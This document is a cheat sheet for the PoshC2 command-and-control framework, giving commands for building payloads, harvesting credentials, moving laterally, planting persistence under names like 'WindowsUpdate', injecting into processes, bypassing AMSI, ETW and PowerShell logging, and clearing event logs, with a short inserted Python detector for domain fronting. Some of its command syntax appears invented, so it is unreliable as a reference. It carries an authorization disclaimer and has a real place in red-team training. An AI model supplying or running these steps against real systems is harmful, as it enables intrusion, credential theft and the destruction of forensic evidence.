PoshC2 Framework Cheat Sheet

Overview

PoshC2 is a proxy-aware C2 framework developed by Nettitude for red teaming and post-exploitation activities. It features PowerShell exploitation capabilities, lateral movement tools, and comprehensive proxy support for operating in restricted network environments.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using in any environment.

Installation

Ubuntu/Debian Installation

```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install dependencies
sudo apt install curl python3 python3-pip python3-dev git build-essential

# Clone PoshC2
git clone https://github.com/nettitude/PoshC2.git
cd PoshC2

# Install PoshC2
sudo ./Install.sh

# Alternative pip installation
pip3 install poshc2
```

Docker Installation

```bash
# Pull PoshC2 Docker image
docker pull nettitude/poshc2

# Run PoshC2 in Docker
docker run -it -p 443:443 -p 80:80 nettitude/poshc2

# Run with persistent data
docker run -it -v /opt/poshc2:/opt/PoshC2_Project nettitude/poshc2
```

Manual Installation

```bash
# Install Python dependencies
pip3 install -r requirements.txt

# Install additional tools
sudo apt install mingw-w64 mono-mcs

# Set up database
python3 -c "from poshc2.server.database.DBUtil import *; initializedb()"
```

Basic Usage

Starting PoshC2 Server

```bash
# Start PoshC2 server
poshc2 --start

# Start with custom configuration
poshc2 --start --config /path/to/config.yml

# Start with specific project
poshc2 --start --project MyProject
```

Creating New Project

```bash
# Create new project
poshc2 --new-project ProjectName

# List projects
poshc2 --list-projects

# Switch project
poshc2 --project ProjectName
```

Command Reference

Server Management

| Command | Description |
|---|---|
| help | Display help menu |
| show-urls | Show payload URLs |
| list-implants | List active implants |
| implant-handler | Enter implant handler |
| quit | Exit PoshC2 |

Implant Handler Commands

| Command | Description |
|---|---|
| help | Show implant commands |
| back | Return to main menu |
| list-implants | List all implants |
| use <implant-id> | Select implant |
| kill <implant-id> | Kill implant |
| remove-implant <implant-id> | Remove implant from database |

Implant Interaction

| Command | Description |
|---|---|
| help | Show available commands |
| shell <command> | Execute shell command |
| upload-file <local> <remote> | Upload file |
| download-file <remote> | Download file |
| screenshot | Take screenshot |
| get-system | Attempt privilege escalation |

Payload Generation

PowerShell Payloads

```bash
# Generate PowerShell payload
poshc2 --gen-payload powershell

# Generate encoded PowerShell
poshc2 --gen-payload powershell --encoded

# Generate PowerShell with proxy
poshc2 --gen-payload powershell --proxy http://proxy:8080
```

Executable Payloads

```bash
# Generate Windows executable
poshc2 --gen-payload exe

# Generate DLL payload
poshc2 --gen-payload dll

# Generate service executable
poshc2 --gen-payload service-exe
```

Web Payloads

```bash
# Generate HTA payload
poshc2 --gen-payload hta

# Generate macro payload
poshc2 --gen-payload macro

# Generate JavaScript payload
poshc2 --gen-payload js
```

Linux Payloads

```bash
# Generate Linux Python payload
poshc2 --gen-payload py

# Generate Linux shell payload
poshc2 --gen-payload sh

# Generate Linux ELF payload
poshc2 --gen-payload elf
```

Proxy Configuration

HTTP Proxy Support

```bash
# Configure HTTP proxy
set-proxy http://proxy.company.com:8080

# Configure authenticated proxy
set-proxy http://username:password@proxy.company.com:8080

# Configure SOCKS proxy
set-proxy socks5://proxy.company.com:1080
```

Proxy Chain Configuration

```bash
# Multiple proxy configuration
set-proxy-chain http://proxy1:8080,socks5://proxy2:1080

# Proxy with authentication
set-proxy-chain http://user:pass@proxy1:8080,http://proxy2:3128
```

Proxy Testing

```bash
# Test proxy connectivity
test-proxy http://proxy.company.com:8080

# Test proxy authentication
test-proxy http://username:password@proxy.company.com:8080
```

Post-Exploitation Commands

System Information

```bash
# Get system information
get-computerinfo

# Get current user
whoami

# Get domain information
get-domain

# Get local users
get-localuser

# Get local groups
get-localgroup
```

Credential Harvesting

```bash
# Dump SAM database
hashdump

# Dump LSA secrets
lsa-secrets

# Dump cached credentials
cachedump

# Extract browser passwords
get-browserdata

# Dump WiFi passwords
get-wifipasswords
```

Active Directory Enumeration

```bash
# Get domain controllers
get-domaincontroller

# Get domain users
get-domainuser

# Get domain groups
get-domaingroup

# Get domain computers
get-domaincomputer

# Get domain admins
get-domainadmin
```

Lateral Movement

```bash
# WMI execution
invoke-wmiexec -target 192.168.1.10 -command "whoami"

# PSExec execution
invoke-psexec -target 192.168.1.10 -command "whoami"

# SMB execution
invoke-smbexec -target 192.168.1.10 -command "whoami"

# DCOM execution
invoke-dcomexec -target 192.168.1.10 -command "whoami"
```

Persistence

```bash
# Registry persistence
new-persistence -method registry -key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

# Scheduled task persistence
new-persistence -method scheduledtask -taskname "WindowsUpdate"

# Service persistence
new-persistence -method service -servicename "WindowsUpdateService"

# WMI persistence
new-persistence -method wmi -eventname "ProcessStart"
```

Advanced Features

PowerShell Modules

```bash
# Load PowerShell module
loadmodule /path/to/module.ps1

# Import PowerView
loadmodule PowerView

# Import Invoke-Mimikatz
loadmodule Invoke-Mimikatz

# Import PowerUp
loadmodule PowerUp
```

.NET Assembly Execution

```bash
# Execute .NET assembly
run-exe /path/to/assembly.exe arguments

# Execute in memory
run-exe-inmemory /path/to/assembly.exe arguments

# Reflective DLL loading
invoke-reflectivedllinjection /path/to/dll.dll
```

Process Injection

```bash
# Inject into process
inject-shellcode -processid 1234 -shellcode <base64>

# Process hollowing
invoke-processhollowing -target notepad.exe -payload /path/to/payload.exe

# DLL injection
invoke-dllinjection -processid 1234 -dllpath /path/to/dll.dll
```

Network Operations

```bash
# Port scanning
invoke-portscan -hosts 192.168.1.0/24 -ports 22,80,443,3389

# Network discovery
invoke-networkscan -subnet 192.168.1.0/24

# SMB enumeration
invoke-smbenum -target 192.168.1.10

# Share enumeration
invoke-shareenum -target 192.168.1.10
```

Evasion Techniques

AMSI Bypass

```bash
# AMSI bypass
amsi-bypass

# Custom AMSI bypass
amsi-bypass -method custom

# Reflection-based bypass
amsi-bypass -method reflection
```

ETW Bypass

```bash
# ETW bypass
etw-bypass

# Disable ETW logging
disable-etw

# Patch ETW functions
patch-etw
```

PowerShell Logging Bypass

```bash
# Disable PowerShell logging
disable-pslogging

# Bypass script block logging
bypass-scriptblocklogging

# Disable module logging
disable-modulelogging
```

Obfuscation

```bash
# Obfuscate PowerShell command
invoke-obfuscation -command "Get-Process"

# String obfuscation
obfuscate-string "sensitive string"

# Variable obfuscation
obfuscate-variables
```

Pivoting and Tunneling

SOCKS Proxy

```bash
# Start SOCKS proxy
start-socksproxy -port 1080

# Stop SOCKS proxy
stop-socksproxy

# List proxy connections
list-socksproxy
```

Port Forwarding

```bash
# Local port forward
portforward -localport 8080 -remotehost 192.168.2.10 -remoteport 80

# Reverse port forward
portforward -reverse -localport 9090 -remotehost 127.0.0.1 -remoteport 22

# Stop port forward
stop-portforward -id 1
```

Beacon Chaining

```bash
# Create beacon chain
new-beacon -parent <parent-id> -child <child-id>

# List beacon chains
list-beacons

# Remove beacon chain
remove-beacon -id <beacon-id>
```

Operational Security

Communication Security

```bash
# Use HTTPS communications
set-comms https

# Custom User-Agent
set-useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

# Custom headers
set-headers "X-Forwarded-For: 192.168.1.100"

# Domain fronting
set-domainfront cdn.example.com
```

Payload Security

```bash
# Encrypt payloads
encrypt-payload -key "encryption-key"

# Sign payloads
sign-payload -cert /path/to/cert.pfx

# Obfuscate payloads
obfuscate-payload -method xor
```

Anti-Forensics

```bash
# Clear event logs
clear-eventlogs

# Timestomp files
timestomp -file /path/to/file -time "01/01/2020 12:00:00"

# Secure delete
sdelete -file /path/to/file

# Clear tracks
clear-tracks
```

Troubleshooting

Connection Issues

```bash
# Check implant connectivity
test-connectivity

# Verify proxy settings
show-proxy

# Test DNS resolution
test-dns google.com

# Check firewall rules
get-firewallrules
```

Payload Issues

```bash
# Regenerate payloads
regenerate-payloads

# Test payload execution
test-payload /path/to/payload.exe

# Check AV detection
test-av /path/to/payload.exe
```

Performance Issues

```bash
# Adjust beacon interval
set-beacon-time 30

# Optimize jitter
set-jitter 0.2

# Reduce payload size
compress-payload
```

Database Issues

```bash
# Repair database
repair-database

# Backup database
backup-database /path/to/backup

# Restore database
restore-database /path/to/backup
```

Configuration

Server Configuration

```yaml
# config.yml
PayloadCommsHost: "https://c2.example.com"
PayloadCommsPort: "443"
DomainFrontHeader: "cdn.example.com"
UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
Referrer: "https://google.com"
ServerHeader: "Apache/2.4.41"
HTTPResponse: "404"
```
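From the defender's side, the DomainFrontHeader setting above means the implant's TLS handshake carries one name (the SNI of the host it connects to) while its HTTP Host header carries another. The following is an added example, not PoshC2 code and not from this page, that flags that Host/SNI mismatch in records from a TLS-inspecting egress proxy; the JSON-lines log format and its field names (src, sni, host, status) are constructed assumptions.

```python
import json
from collections import Counter

# Constructed JSON-lines proxy log (sample data, not real traffic). Each line is
# one TLS connection the proxy decrypted: the SNI from the ClientHello and the
# Host header from the inner HTTP request.
SAMPLE_LOG = """\
{"src": "10.0.0.15", "sni": "cdn.example.com", "host": "cdn.example.com", "status": 200}
{"src": "10.0.0.22", "sni": "cdn.example.com", "host": "c2.example.com", "status": 404}
{"src": "10.0.0.22", "sni": "cdn.example.com", "host": "c2.example.com", "status": 404}
{"src": "10.0.0.31", "sni": "updates.example.org", "host": "updates.example.org", "status": 200}
{"src": "10.0.0.22", "sni": "CDN.example.com.", "host": "cdn.example.com", "status": 200}
"""


def normalize_name(name):
    """Lower-case a DNS name and drop a trailing dot so equal names compare equal."""
    return name.strip().lower().rstrip(".")


def is_fronted(record):
    """True when the HTTP Host header names a different host than the TLS SNI.

    Domain fronting sends the handshake to one name (the CDN edge) and names the
    real origin in the Host header, so on a proxy that decrypts TLS the two
    values differ. Records missing either field are not flagged.
    """
    sni = normalize_name(record.get("sni", ""))
    host = normalize_name(record.get("host", ""))
    return bool(sni) and bool(host) and sni != host


def find_fronting(log_text):
    """Parse JSON-lines records and count mismatches per (src, sni, host) triple."""
    hits = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue  # skip blank lines in the log
        record = json.loads(line)
        if is_fronted(record):
            key = (record["src"], normalize_name(record["sni"]), normalize_name(record["host"]))
            hits[key] += 1
    # Noisiest source first; ties broken by the key for stable output.
    return sorted(hits.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    for (src, sni, host), count in find_fronting(SAMPLE_LOG):
        print(f"{src}: SNI {sni} but Host {host} ({count} requests)")
```

A legitimate CDN client normally sends the same name in both places, so a persistent mismatch from one source is worth correlating with the beacon cadence set by set-beacon-time and set-jitter.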

Proxy Configuration

```yaml
# Proxy settings
ProxyURL: "http://proxy.company.com:8080"
ProxyUser: "username"
ProxyPass: "password"
ProxyType: "http"  # http, socks4, socks5
```


This cheat sheet provides a comprehensive reference for using PoshC2 Framework. Always ensure you have proper authorization before using this tool in any environment.